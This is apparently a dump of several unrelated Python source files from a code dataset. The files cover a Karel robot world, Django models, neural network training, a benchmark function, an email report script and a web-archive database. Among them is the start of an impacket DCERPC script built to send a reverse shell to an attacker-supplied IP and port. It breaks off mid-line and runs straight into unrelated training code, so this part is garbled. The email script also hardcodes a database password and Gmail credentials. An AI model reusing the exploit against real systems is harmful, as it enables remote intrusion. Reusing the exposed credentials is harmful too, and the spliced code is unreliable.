self._num_streets\n\n\t@num_streets.setter\n\tdef num_streets(self, val):\n\t\tself._num_streets = val\n\n\t@property\n\tdef num_avenues(self):\n\t\treturn self._num_avenues\n\t\n\t@num_avenues.setter\n\tdef num_avenues(self, val):\n\t\tself._num_avenues = val\n\n\t@property\n\tdef beepers(self):\n\t\treturn self._beepers\n\n\t@property\n\tdef corner_colors(self):\n\t\treturn self._corner_colors\n\t\n\t@property\n\tdef walls(self):\n\t\treturn self._walls\n\t\n\tdef load_from_file(self):\n\t\tdef parse_line(line):\n\t\t\t# Ignore blank lines and lines with no comma delineator\n\t\t\tif not line or \":\" not in line:\n\t\t\t\treturn None, None, False\n\n\t\t\tparams = {}\n\t\t\tcomponents = line.strip().split(KEYWORD_DELIM)\n\t\t\tkeyword = components[0].lower()\n\n\t\t\t# only accept valid keywords as defined in world file spec\n\t\t\tif keyword not in VALID_WORLD_KEYWORDS:\n\t\t\t\treturn None, None, False\n\n\t\t\tparam_list = components[1].split(PARAM_DELIM)\n\n\t\t\tfor param in param_list:\n\t\t\t\tparam = param.strip().lower()\n\n\t\t\t\t# first check to see if the parameter is a direction value\n\t\t\t\tif param in VALID_DIRECTIONS:\n\t\t\t\t\tparams[\"dir\"] = DIRECTIONS_MAP[param]\n\t\t\t\telse:\n\t\t\t\t\t# next check to see if parameter encodes a location\n\t\t\t\t\tcoordinate = re.match(r\"\\((\\d+),\\s*(\\d+)\\)\", param)\n\t\t\t\t\tif coordinate:\n\t\t\t\t\t\tavenue = int(coordinate.group(1))\n\t\t\t\t\t\tstreet = int(coordinate.group(2))\n\t\t\t\t\t\tparams[\"loc\"] = (avenue, street)\n\t\t\t\t\telse:\n\t\t\t\t\t\t# finally check to see if parameter encodes a numerical value or color string\n\t\t\t\t\t\tval = None\n\t\t\t\t\t\tif param.isdigit():\n\t\t\t\t\t\t\tval = int(param)\n\t\t\t\t\t\telif keyword == \"speed\":\n\t\t\t\t\t\t\t# double values are only allowed for speed parameter\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tval = int(100 * float(param))\n\t\t\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\t\t\t# invalid parameter value, do not process\n\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\telif keyword == \"beeperbag\":\n\t\t\t\t\t\t\t# handle the edge case where Karel has infinite beepers\n\t\t\t\t\t\t\tif param == \"infinity\" or param == \"infinite\":\n\t\t\t\t\t\t\t\tval = INFINITY\n\t\t\t\t\t\telif keyword == \"color\":\n\t\t\t\t\t\t\t# TODO: add check for valid color? \n\t\t\t\t\t\t\tval = param \n\t\t\t\t\t\t# only store non-null values\n\t\t\t\t\t\tif val is not None: params[\"val\"] = val\n\n\t\t\treturn keyword.lower(), params, True\n\n\n\t\tfor i, line in enumerate(self._world_file):\n\t\t\tkeyword, params, is_valid = parse_line(line)\n\n\t\t\t# skip invalid lines (comments, incorrectly formatted, invalid keyword)\n\t\t\tif not is_valid:\n\t\t\t\t# print(f\"Ignoring line {i} of world file: {line.strip()}\")\n\t\t\t\tcontinue\n\n\t\t\t# TODO: add error detection for keywords with insufficient parameters\n\n\t\t\t# handle all different possible keyword cases\n\t\t\tif keyword == \"dimension\":\n\t\t\t\t# set world dimensions based on location values\n\t\t\t\tself._num_avenues, self._num_streets = params[\"loc\"]\n\n\t\t\telif keyword == \"wall\":\n\t\t\t\t# build a wall at the specified location\n\t\t\t\tavenue, street = params[\"loc\"]\n\t\t\t\tdirection = params[\"dir\"]\n\t\t\t\tself._walls.add(Wall(avenue, street, direction))\n\n\t\t\telif keyword == \"beeper\":\n\t\t\t\t# add the specified number of beepers to the world\n\t\t\t\tavenue, street = params[\"loc\"]\n\t\t\t\tcount = params[\"val\"]\n\t\t\t\tself._beepers[(avenue, street)] += count\n\n\t\t\telif keyword == \"karel\":\n\t\t\t\t# Give Karel initial state values\n\t\t\t\tavenue, street = params[\"loc\"]\n\t\t\t\tdirection = params[\"dir\"]\n\t\t\t\tself._karel_starting_location = (avenue, street)\n\t\t\t\tself._karel_starting_direction = direction\n\n\t\t\telif keyword == \"beeperbag\":\n\t\t\t\t# Set Karel's initial beeper bag count\n\t\t\t\tcount = params[\"val\"]\n\t\t\t\tself._karel_starting_beeper_count = count\n\n\t\t\telif keyword == \"speed\":\n\t\t\t\t# Set delay speed of program execution\n\t\t\t\tspeed = params[\"val\"]\n\t\t\t\tself._init_speed = speed\n\n\t\t\telif keyword == \"color\":\n\t\t\t\t# Set corner color to be specified color\n\t\t\t\tavenue, street = params[\"loc\"]\n\t\t\t\tcolor = params[\"val\"]\n\t\t\t\tself._corner_colors[(avenue, street)] = color\n\n\tdef add_beeper(self, avenue, street):\n\t\tself._beepers[(avenue, street)] += 1\n\n\tdef remove_beeper(self, avenue, street):\n\t\tif self._beepers[(avenue, street)] == 0:\n\t\t\treturn\n\t\tself._beepers[(avenue, street)] -= 1\n\n\tdef add_wall(self, wall):\n\t\talt_wall = self.get_alt_wall(wall)\n\t\tif wall not in self._walls and alt_wall not in self._walls:\n\t\t\tself._walls.add(wall)\n\n\tdef remove_wall(self, wall):\n\t\talt_wall = self.get_alt_wall(wall)\n\t\tif wall in self._walls:\n\t\t\tself._walls.remove(wall)\n\t\tif alt_wall in self._walls:\n\t\t\tself._walls.remove(alt_wall)\n\t\t\n\tdef get_alt_wall(self, wall):\n\t\tif wall.direction == Direction.NORTH:\n\t\t\treturn Wall(wall.avenue, wall.street + 1, Direction.SOUTH)\n\t\tif wall.direction == Direction.SOUTH:\n\t\t\treturn Wall(wall.avenue, wall.street - 1, Direction.NORTH)\n\t\tif wall.direction == Direction.EAST:\n\t\t\treturn Wall(wall.avenue + 1, wall.street, Direction.WEST)\n\t\tif wall.direction == Direction.WEST:\n\t\t\treturn Wall(wall.avenue - 1, wall.street, Direction.EAST)\n\n\tdef paint_corner(self, avenue, street, color):\n\t\tself._corner_colors[(avenue, street)] = color\n\n\tdef corner_color(self, avenue, street):\n\t\treturn self._corner_colors[(avenue, street)]\n\n\tdef reset_corner(self, avenue, street):\n\t\tself._beepers[(avenue, street)] = 0\n\t\tself._corner_colors[(avenue, street)] = \"\"\n\n\tdef wall_exists(self, avenue, street, direction):\n\t\twall = Wall(avenue, street, direction)\n\t\treturn wall in self._walls\n\n\tdef in_bounds(self, avenue, street):\n\t\treturn avenue > 0 and street > 0 and avenue <= self._num_avenues and street <= self._num_streets\n\n\tdef reset_world(self):\n\t\t\"\"\"\n\t\tReset initial state of beepers in the world\n\t\t\"\"\"\n\t\tself._beepers = copy.deepcopy(self._init_beepers)\n\t\tself._corner_colors = collections.defaultdict(lambda: \"\")\n\n\tdef reload_world(self, filename=None):\n\t\t\"\"\"\n\t\tTODO: Do better decomp to not just copy constructor\n\t\t\"\"\"\n\t\t\n\t\tself._beepers = collections.defaultdict(int)\n\t\tself._corner_colors = collections.defaultdict(lambda: \"\")\n\t\tself._walls = set()\n\n\t\tself._num_streets = 1\n\t\tself._num_avenues = 1\n\n\t\tself._karel_starting_location = (1, 1)\n\t\tself._karel_starting_direction = Direction.EAST\n\t\tself._karel_starting_beeper_count = 0\n\n\t\tself._init_speed = INIT_SPEED\n\n\t\tif filename:\n\t\t\tself._world_file = open(filename, 'r')\n\t\t\tself.load_from_file()\n\n\t\tself._init_beepers = copy.deepcopy(self._beepers)\n\n\tdef save_to_file(self, filename, karel):\n\t\twith open(filename, \"w\") as f:\n\t\t\t# First, output dimensions of world\n\t\t\tf.write(f\"Dimension: ({self.num_avenues}, {self.num_streets})\\n\")\n\n\t\t\t# Next, output all walls\n\t\t\tfor wall in self._walls:\n\t\t\t\tf.write(f\"Wall: ({wall.avenue}, {wall.street}); {DIRECTIONS_MAP_INVERSE[wall.direction]}\\n\")\n\n\t\t\t# Next, output all beepers\n\t\t\tfor loc, count in self._beepers.items():\n\t\t\t\tf.write(f\"Beeper: ({loc[0]}, {loc[1]}); {count}\\n\")\n\n\t\t\t# Next, output all color information\n\t\t\tfor loc, color in self._corner_colors.items():\n\t\t\t\tif color:\n\t\t\t\t\tf.write(f\"Color: ({loc[0]}, {loc[1]}); {color}\\n\")\n\n\t\t\t# Next, output Karel information\n\t\t\tf.write(f\"Karel: ({karel.avenue}, {karel.street}); {DIRECTIONS_MAP_INVERSE[karel.direction]}\\n\")\n\t\t\t\n\t\t\t# Finally, output beeperbag info\n\t\t\tbeeper_output = karel.num_beepers if karel.num_beepers >= 0 else \"INFINITY\"\n\t\t\tf.write(f\"BeeperBag: {beeper_output}\\n\")\n","sub_path":"diagnostic/karel/KarelWorld.py","file_name":"KarelWorld.py","file_ext":"py","file_size_in_byte":9862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"512931182","text":"from django.conf import settings\nfrom django.contrib.auth.models import User as AuthUser\nfrom django.contrib.auth.models import AbstractUser\nfrom django.contrib.auth.models import UserManager as AuthUserManager\nfrom django.contrib.auth.signals import user_logged_in\nfrom django.core.mail import send_mail\nfrom django.db import models\nfrom django.db.models.signals import post_save\n\n\n\n'''\nclass User(AuthUser):\n class Meta:\n proxy = True\n\n @property\n def name(self):\n return '{} {}'.format(self.last_name, self.first_name)\n'''\n\nclass UserManager(AuthUserManager):\n def create_superuser(self, username, email, password, **extra_fields):\n extra_fields.setdefault('sex', 'm')\n return super().create_superuser(username, email, password, **extra_fields)\n\n\nclass User(AbstractUser):\n sex = models.CharField(\n max_length=1, \n default = 1,\n choices=(\n ('f', 'female'),\n ('m', 'male')\n ))\n\n \n\nclass Profile(models.Model):\n user = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n bio = models.TextField(blank=True)\n website_url = models.URLField(blank=True)\n part = models.IntegerField(\n default = 1,\n choices=(\n (1, '가슴'),\n (2, '배')\n )\n )\n\n\ndef on_post_save_for_user(sender, **kwargs):\n if kwargs['created']:\n # 가입 시기\n user = kwargs['instance']\n #Profile.objects.create(user=user)\n\n # 환영 이메일 보내기\n send_mail(\n '환영합니다',\n 'Here is the message',\n 'me@gmail.com',\n [user.email],\n fail_silently=False,\n )\n\npost_save.connect(on_post_save_for_user, sender=settings.AUTH_USER_MODEL)\n\n\nclass UserSession(models.Model):\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, editable=False)\n session_key = models.CharField(max_length=40, editable=False)\n created_at = models.DateTimeField(auto_now_add=True)\n\n\n\ndef kick_my_other_sessions(sender, request, user, **kwargs):\n print(\"kicked my other sessions\")\n user.is_user_logged_in = True\n\nuser_logged_in.connect(kick_my_other_sessions, dispatch_uid='user_logged_in')","sub_path":"accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"288577101","text":"import argparse\nfrom impacket.structure import Structure\nfrom impacket.uuid import uuidtup_to_bin\nfrom impacket.dcerpc.v5 import transport\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerpc.v5.transport import DCERPCTransportFactory\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-rip\", help=\"Remote computer to target\", dest=\"target_ip\", type=str, required=True)\nparser.add_argument(\"-rport\", help=\"IP of the remote procedure listener\", dest=\"port\", type=int, required=True)\nparser.add_argument(\"-lip\", help=\"Local IP to receive the reverse shell\", dest=\"lip\", type=str, required=True)\nparser.add_argument(\"-lport\", help=\"Local port to receive the reverse shell\", dest=\"lport\", type=int, required=True)\n\nargs = parser.parse_args()\ntarget_ip = args.target_ip\nport = args.port\nlip = args.lip\nlport = args.lport\n\nclass SendReverseShell(Structure):\n global lip\n global lport\n print(lip, lport)\n format_ip = f\"<{len(lip) + 1}s\"\n structure = (\n # Yeah fuck this x)\n ('unknown', '<12s'),\n # <(Size of ip address + \\x00)s\n ('ip_address', format_ip),\n # <5 - (Size of len(port)xh\n ('port', \"= size:\r\n batch_end = size\r\n\r\n\r\n var_x = self.to_variable(x[i:batch_end])\r\n var_y = self.to_variable(y[i:batch_end], True)\r\n\r\n y_res = self.model(var_x)\r\n # if not train:\r\n # print('y_res:',y_res)\r\n # print('var_y:',var_y)\r\n\r\n loss = self.loss_function(y_res, var_y)\r\n\r\n #only for train step, update the network\r\n if train:\r\n self.optimizer.zero_grad()\r\n loss.backward()\r\n self.optimizer.step()\r\n\r\n # loss_sum += loss.item()\r\n losses.append(loss.item())\r\n i = batch_end\r\n\r\n pred_y = y_res.data.cpu()\r\n pred_y = torch.max(F.softmax(pred_y, dim=1), 1)[1]\r\n pred_res_total.extend(pred_y)\r\n\r\n\r\n acc = self.get_accuracy(y, np.array(pred_res_total))\r\n\r\n # ave_loss = loss_sum / batch_number\r\n ave_loss = np.average(losses)\r\n\r\n return acc, ave_loss\r\n\r\n def train_model(self):\r\n train_acc_list, train_loss_list, val_acc_list, val_loss_list = [], [], [], []\r\n\r\n for epoch in range(EPOCHES):\r\n\r\n train_acc, train_loss = self.train()\r\n\r\n # add into the list to save\r\n train_acc_list.append(train_acc)\r\n train_loss_list.append(train_loss)\r\n\r\n #test val\r\n val_acc, val_loss = self.train(train=False,val=True)\r\n val_acc_list.append(val_acc)\r\n val_loss_list.append(val_loss)\r\n\r\n\r\n if epoch%200 == 0:\r\n print('epoch {}'.format(epoch))\r\n print('Train: accuracy is %.1f, average loss is %.2f' % (train_acc * 100, train_loss))\r\n print('Val: accuracy is %.1f, average loss is %.2f' % (val_acc * 100, val_loss))\r\n\r\n self.earlystop(val_loss, val_acc,self.model, self.lr, self.hidden_size, self.model_type, self.init_weight_type,self.path,dic_save_all)\r\n\r\n return train_acc_list, train_loss_list, val_acc_list, val_loss_list\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n def draw_plot(self,train_list,dev_list,acc=True):\r\n plt.figure()\r\n plt.plot(np.array(train_list))\r\n plt.plot(np.array(dev_list))\r\n if acc:\r\n plt.title('model={}_lr={}_hidden={}_inw={}_Accuracy'.format(self.model_type,self.lr,self.hidden_size,self.init_weight_type))\r\n plt.ylabel('accuracy')\r\n plt.xlabel('epoch')\r\n plt.legend(['train', 'val'], loc='upper left')\r\n plt.savefig(\"{}model={}_lr={}_hidden={}_inw={}_Accuracy.jpg\".format(self.path,self.model_type,self.lr,self.hidden_size,self.init_weight_type))\r\n # plt.show()\r\n\r\n else:\r\n plt.title('model={}_lr={}_hidden={}_inw={}_Loss'.format(self.model_type,self.lr,self.hidden_size,self.init_weight_type))\r\n plt.ylabel('loss')\r\n plt.xlabel('epoch')\r\n plt.legend(['train', 'val'], loc='upper left')\r\n plt.savefig(\"{}model={}_lr={}_hidden={}_inw={}_Loss.jpg\".format(self.path,self.model_type,self.lr,self.hidden_size,self.init_weight_type))\r\n # plt.show()\r\n plt.close()\r\n\r\n\r\n def draw_acc_and_loss(self, list):\r\n train_acc_list, train_loss_list, val_acc_list, val_loss_list = list[0], list[1], list[2], list[3]\r\n self.draw_plot(train_acc_list, val_acc_list, True)\r\n self.draw_plot(train_loss_list, val_loss_list, False)\r\n\r\ndef print_dic_to_csv(dic,path):\r\n dic = OrderedDict(sorted(dic.items(),key=lambda t: t[1][0]))\r\n # print(dic)\r\n df = pd.DataFrame.from_dict(dic,orient=\"index\")\r\n df.to_csv(path+\"models.csv\")\r\n\r\n\r\n\r\n\r\ndef main():\r\n global dic_save_all\r\n \"\"\"\r\n total three test\r\n 1:Adam\r\n 2:RMSprop\r\n 3:SGD + momentum \r\n represent:\r\n model type: 0: RNN 1: LSTM 2:GRU\r\n init_weight_type: 0: normal 1: xavier_normal 2: orthogonal 3: uniform\r\n\r\n :return:\r\n \"\"\"\r\n\r\n # dataset = DataSet(TARGET,TIME_STEP,)\r\n # f = open('dataset_w.txt','wb')\r\n # pickle.dump(dataset,f)\r\n # f.close()\r\n\r\n\r\n #test 1: Adam op_type=0\r\n\r\n path = save_path + 'Adam\\\\'\r\n learning_rates = [0.001,0.002]\r\n\r\n\r\n\r\n for lr in learning_rates:\r\n for hidden in hiddens:\r\n #should be four\r\n for init_weight in range(3):\r\n for model_type in range(1,3):\r\n #init the trainer with different parameters and rnn\r\n trainer = Trainer(2,hidden,2,path,model_type=model_type,lr=lr,op_type=0,init_weight_type=init_weight,dropout=0)\r\n #get the train and val acc and loss\r\n lists = trainer.train_model()\r\n #draw the acc and loss\r\n trainer.draw_acc_and_loss(lists)\r\n\r\n # print(dic_save_all)\r\n print_dic_to_csv(dic_save_all,path)\r\n\r\n\r\n #test 2:\r\n # dic_save_all = {}\r\n #\r\n # path = save_path + 'RMSprop\\\\'\r\n # learning_rates = [0.001, 0.002]\r\n #\r\n # for lr in learning_rates:\r\n # for hidden in hiddens:\r\n # # should be four\r\n # for init_weight in range(4):\r\n # for model_type in range(3):\r\n # # init the trainer with different parameters and rnn\r\n # trainer = Trainer(2, hidden, 2, path, model_type=model_type, lr=lr, op_type=1,init_weight_type=init_weight, dropout=0)\r\n # # get the train and val acc and loss\r\n # lists = trainer.train_model()\r\n # # draw the acc and loss\r\n # trainer.draw_acc_and_loss(lists)\r\n #\r\n # # print(dic_save_all)\r\n # print_dic_to_csv(dic_save_all, path)\r\n\r\n #test 3:\r\n dic_save_all = {}\r\n\r\n path = save_path + 'SGD_mom\\\\'\r\n learning_rates = [0.001,0.01]\r\n\r\n\r\n for lr in learning_rates:\r\n for hidden in hiddens:\r\n # should be four\r\n for init_weight in range(3):\r\n for model_type in range(1,3):\r\n # init the trainer with different parameters and rnn\r\n trainer = Trainer(2, hidden, 2, path, model_type=model_type, lr=lr, op_type=2,init_weight_type=init_weight, dropout=0)\r\n # get the train and val acc and loss\r\n lists = trainer.train_model()\r\n # draw the acc and loss\r\n trainer.draw_acc_and_loss(lists)\r\n print_dic_to_csv(dic_save_all, path)\r\n\r\n\r\nif __name__ =='__main__':\r\n\r\n main()\r\n\r\n\r\n\r\n\r\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"548712222","text":"#!/usr/bin/env python\n# ------------------------------------------------------------------------------------------------------%\n# Created by \"Thieu Nguyen\" at 16:07, 20/04/2020 %\n# %\n# Email: nguyenthieu2102@gmail.com %\n# Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 %\n# Github: https://github.com/thieu1995 %\n#-------------------------------------------------------------------------------------------------------%\n\nfrom opfunu.cec.cec2005.root import Root\nfrom numpy import dot, sin, cos\nfrom pandas import read_csv\n\n\nclass Model(Root):\n def __init__(self, f_name=\"Schwefel's Problem 2.13\", f_shift_data_file=\"data_schwefel_213\",\n f_ext='.txt', f_bias=-460):\n Root.__init__(self, f_name, f_shift_data_file, f_ext, f_bias)\n\n def load_shift_data(self):\n data = read_csv(self.support_path_data + self.f_shift_data_file + self.f_ext, delimiter='\\s+', index_col=False, header=None)\n data = data.values\n a_matrix = data[:100, :]\n b_matrix = data[100:200, :]\n shift_data = data[200:, :]\n return shift_data, a_matrix, b_matrix\n\n def _main__(self, solution=None):\n problem_size = len(solution)\n if problem_size > 100:\n print(\"CEC 2005 not support for problem size > 100\")\n return 1\n shift_data, a_matrix, b_matrix = self.load_shift_data()\n shift_data = shift_data.reshape(-1)[:problem_size]\n a_matrix = a_matrix[:problem_size, :problem_size]\n b_matrix = b_matrix[:problem_size, :problem_size]\n\n result = 0.0\n for i in range(0, problem_size):\n t1 = dot(a_matrix[i], sin(shift_data)) + dot(b_matrix[i], cos(shift_data))\n t2 = dot(a_matrix[i], sin(solution)) + dot(b_matrix[i], cos(solution))\n result += (t1-t2)**2\n return result + self.f_bias\n\n","sub_path":"opfunu/cec/cec2005/F12.py","file_name":"F12.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"39428065","text":"from sqlalchemy import create_engine\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom datetime import date,datetime,timedelta\r\nimport smtplib\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.text import MIMEText\r\n\r\ndef create_imtrn(businessId):\r\n engine = create_engine('postgresql://postgres:Asaddat098765432!@localhost:5432/da')\r\n\r\n #bring in the imtrn for stock and sales analysis:\r\n df_imtrn = pd.read_sql('select ztime,zutime,zid,ximtrnnum,xitem,xwh,xdate,xyear,xper,xqty,xval,xdoctype,xdocnum,xsec,xproj,xbatch,xcus,xsup,xaction,xsign,xstdprice from imtrn where zid = %s' %(businessId), con=engine)\r\n\r\n #quantity in or out total\r\n df_imtrn['xflow'] = df_imtrn['xqty'] * df_imtrn['xsign']\r\n df_imtrn['xavgcost'] = df_imtrn['xval']/df_imtrn['xqty']\r\n\r\n #seperate out the prefix just in case and make a new key with customer,item and date\r\n df_imtrn['ximtrnprefix'] = df_imtrn['ximtrnnum'].apply(lambda x: x.split('0')[0])\r\n df_imtrn['ximtrnprefix'] = df_imtrn['ximtrnprefix'].apply(lambda x: x.split('1')[0])\r\n\r\n return df_imtrn\r\n\r\ndef create_gldetail(businessId):\r\n engine = create_engine('postgresql://postgres:Asaddat098765432!@localhost:5432/da')\r\n\r\n df_detail = pd.read_sql('select ztime,zutime,zid,xvoucher,xacc,xaccusage,xaccsource,xsub,xproj,xprime,zemail,xpaytype from gldetail where zid = %s'%(businessId), con = engine)\r\n df_header = pd.read_sql('select ztime,zid,xvoucher,xref,xdate,xyear,xper,xstatusjv from glheader where zid = %s'% (businessId),con=engine)\r\n df_glmst = pd.read_sql('select xacc,xdesc,xacctype,xaccusage,xaccsource,xhrc1,xhrc2 from glmst where zid = %s'%(businessId), con=engine)\r\n df_detail = df_detail.merge(df_header,on='xvoucher',how='left')\r\n df_detail = df_detail.merge(df_glmst,on='xacc',how='left')\r\n df_detail['day_head'] = df_detail['xdate'].apply(lambda x: x.day)\r\n df_detail['month_head'] = df_detail['xdate'].apply(lambda x: x.month)\r\n df_detail['year_head'] = df_detail['xdate'].apply(lambda x: x.year)\r\n df_detail['xvouch'] = df_detail['xvoucher'].apply(lambda x: x.split('0')[0])\r\n df_detail['xvouch'] = df_detail['xvouch'].apply(lambda x: x.split('1')[0])\r\n\r\n return df_detail\r\n\r\ndef check_Trasaction(businessId):\r\n now_year = datetime.now().year\r\n last_month = datetime.now().month - 1\r\n\r\n if (last_month == 0):\r\n now_year = now_year - 1\r\n last_month = 12\r\n else:\r\n pass\r\n\r\n df_imtrn = create_imtrn(businessId)\r\n df_imtrn = df_imtrn[(df_imtrn['xyear']==now_year) & (df_imtrn['xper']==last_month)]\r\n\r\n impr_list = df_imtrn['ximtrnprefix'].value_counts().index.tolist()\r\n wh_list = df_imtrn['xwh'].value_counts().index.tolist()\r\n\r\n df_trn = pd.DataFrame(index=impr_list)\r\n df_trn = df_trn.reset_index()\r\n df_trn = df_trn.rename(columns={'index':'ximtrnprefix'})\r\n\r\n for i in wh_list:\r\n df_wh = pd.DataFrame(df_imtrn[df_imtrn['xwh']==i].groupby('ximtrnprefix')['xval'].sum())\r\n df_wh = df_wh.reset_index()\r\n df_trn = df_trn.merge(df_wh,on='ximtrnprefix',how='left')\r\n df_trn = df_trn.rename(columns={'xval':'%s'%(i)})\r\n\r\n df_trn = df_trn.fillna(value=0,axis=1)\r\n df_trn = df_trn.round(2)\r\n\r\n return df_trn\r\n\r\ndef check_glim(businessId):\r\n now_year = datetime.now().year\r\n last_month = datetime.now().month - 1\r\n\r\n if (last_month == 0):\r\n now_year = now_year - 1\r\n last_month = 12\r\n else:\r\n pass\r\n\r\n df_detail = create_gldetail(businessId)\r\n df_detail = df_detail[(df_detail['xyear']==now_year) & (df_detail['xper']==last_month)]\r\n\r\n glTran_list = ['ITCS','CSJV','RMIS','FIAD','RIAD','MORE','SRET']\r\n df_trn = pd.DataFrame(index=glTran_list)\r\n df_trn = df_trn.reset_index()\r\n df_trn = df_trn.rename(columns={'index':'xvouch'})\r\n\r\n pr_list = df_detail['xproj'].value_counts().index.tolist()\r\n\r\n for i in pr_list:\r\n df_proj = pd.DataFrame(df_detail[(df_detail['xproj']==i) & (df_detail['xacctype']=='Expenditure')].groupby('xvouch')['xprime'].sum())\r\n df_proj = df_proj.reset_index()\r\n df_trn = df_trn.merge(df_proj,on='xvouch',how='left')\r\n df_trn = df_trn.rename(columns={'xprime':'%s'%(i)})\r\n\r\n df_trn = df_trn.fillna(value=0,axis=1)\r\n df_trn = df_trn.round(2)\r\n\r\n return df_trn\r\n\r\ndf_tranKarigor = check_Trasaction(100000)\r\ndf_glimKarigor = check_glim(100000)\r\ndf_tranTrading = check_Trasaction(100001)\r\ndf_glimTrading = check_glim(100001)\r\n\r\nme = \"pythonhmbr12@gmail.com\"\r\nyou = [\"asaddat87@gmail.com\",\"motiurhmbr@gmail.com\",\"Financehmbr2@gmail.com\"]\r\n\r\nmsg = MIMEMultipart('alternative')\r\nmsg['Subject'] = \"IM to GL check\"\r\nmsg['From'] = me\r\nmsg['To'] = \", \".join(you)\r\n\r\nHEADER = '''\r\n\r\n \r\n \r\n \r\n'''\r\nFOOTER = '''\r\n \r\n\r\n'''\r\nwith open('test.html','w') as f:\r\n f.write(HEADER)\r\n f.write('Trading Inventory Transactions')\r\n f.write(df_tranTrading.to_html())\r\n f.write('Trading GL Transactions')\r\n f.write(df_glimTrading.to_html())\r\n f.write('Karigor Inventory Transactions')\r\n f.write(df_tranKarigor.to_html())\r\n f.write('Karigor GL Transactions')\r\n f.write(df_glimKarigor.to_html())\r\n f.write(FOOTER)\r\n\r\nfilename = \"test.html\"\r\nf = open(filename)\r\nattachment = MIMEText(f.read(),'html')\r\nmsg.attach(attachment)\r\n\r\nusername = 'pythonhmbr12'\r\npassword = 'HMBR123321'\r\n\r\ns = smtplib.SMTP('smtp.gmail.com:587')\r\ns.starttls()\r\ns.login(username, password)\r\ns.sendmail(me,you,msg.as_string())\r\ns.quit()\r\n","sub_path":"gl_check_email.py","file_name":"gl_check_email.py","file_ext":"py","file_size_in_byte":5500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"30683924","text":"from pathlib import Path\r\nimport arrow\r\nimport apsw\r\nimport zlib\r\nfrom functools import lru_cache\r\nfrom common import *\r\nfrom config import get_config\r\n# https://stackoverflow.com/a/36730717\r\n\r\n\r\nclass Database:\r\n\r\n def __init__(self, db_path):\r\n self.db_path = db_path\r\n self.db = None\r\n\r\n def __enter__(self):\r\n self.open()\r\n return self\r\n\r\n def __exit__(self, exc_type, exc_val, exc_tb):\r\n self.close()\r\n\r\n def open(self):\r\n need_init = not Path(self.db_path).exists()\r\n self.db = apsw.Connection(self.db_path)\r\n if need_init:\r\n info('Creating a new DB at ' + self.db_path)\r\n self.init_database()\r\n\r\n def init_database(self):\r\n cursor = self.db.cursor()\r\n cursor.execute(\"CREATE VIRTUAL TABLE page_index USING fts4(title, body, tags, page_id);\")\r\n cursor.execute(\"\"\"CREATE TABLE resources (\r\n resource_id text primary key not null, \r\n original_name text,\r\n created_at timestamp not null,\r\n is_compressed integer not null,\r\n mimetype text,\r\n content blob not null);\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE pages (\r\n page_id integer primary key not null, \r\n title text null,\r\n created_at timestamp not null,\r\n resource_id text,\r\n thumbnail blob);\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE page_resource_map (\r\n page_resource_map_id integer primary key not null, \r\n page_id integer,\r\n resource_id text,\r\n UNIQUE (page_id, resource_id) ON CONFLICT REPLACE\r\n );\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE tags (\r\n tag_id integer primary key not null, \r\n name text not null);\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE page_tag_map (\r\n page_tag_map_id integer primary key not null, \r\n page_id integer,\r\n tag_id integer,\r\n UNIQUE (page_id, tag_id) ON CONFLICT REPLACE\r\n );\"\"\")\r\n\r\n @lru_cache(get_config().app.db_cache_max_size)\r\n def get_resource(self, resource_id: str):\r\n cursor = self.db.cursor()\r\n resource = cursor.execute(\"select resource_id, original_name, created_at, is_compressed, content, mimetype from resources where resource_id=?\", (resource_id, )) \\\r\n .fetchone()\r\n if not resource:\r\n return\r\n resource_id, original_name, created_at, is_compressed, content, mimetype = resource\r\n if is_compressed == 1:\r\n content = zlib.decompress(content)\r\n return original_name, arrow.get(created_at), content, mimetype\r\n\r\n def store_resource(self, resource_id, orignal_name, do_compression, content, mimetype):\r\n created_at = str(arrow.utcnow())\r\n is_compressed = 0\r\n if get_config().app.enable_compression and do_compression:\r\n content = zlib.compress(content)\r\n is_compressed = 1\r\n cursor = self.db.cursor()\r\n cursor.execute(\r\n \"insert into resources values (?,?,?,?,?,?)\",\r\n (resource_id, orignal_name, created_at, is_compressed, mimetype, content))\r\n\r\n def create_page(self, url):\r\n created_at = str(arrow.utcnow())\r\n cursor = self.db.cursor()\r\n new_id = cursor.execute(\r\n \"insert into pages (title, created_at) values (?, ?); select last_insert_rowid();\",\r\n (url, created_at)) \\\r\n .fetchone()[0]\r\n return new_id\r\n\r\n def update_page(self, page_id, resource_id, thumbnail):\r\n cursor = self.db.cursor()\r\n cursor.execute(\r\n \"update pages set thumbnail=?, resource_id=? where page_id=?\",\r\n (thumbnail, resource_id, page_id))\r\n\r\n def associate_page_resource(self, page_id, resource_id):\r\n cursor = self.db.cursor()\r\n cursor.execute(\r\n \"insert into page_resource_map (page_id, resource_id) values (?,?)\",\r\n (page_id, resource_id))\r\n\r\n def get_all_page_resources(self, page_id):\r\n cursor = self.db.cursor()\r\n data = cursor.execute(\"select resource_id from page_resource_map where page_id=?\", (page_id,)).fetchall()\r\n for res_id in data:\r\n name, time, content = self.get_resource(res_id[0])\r\n yield res_id[0], 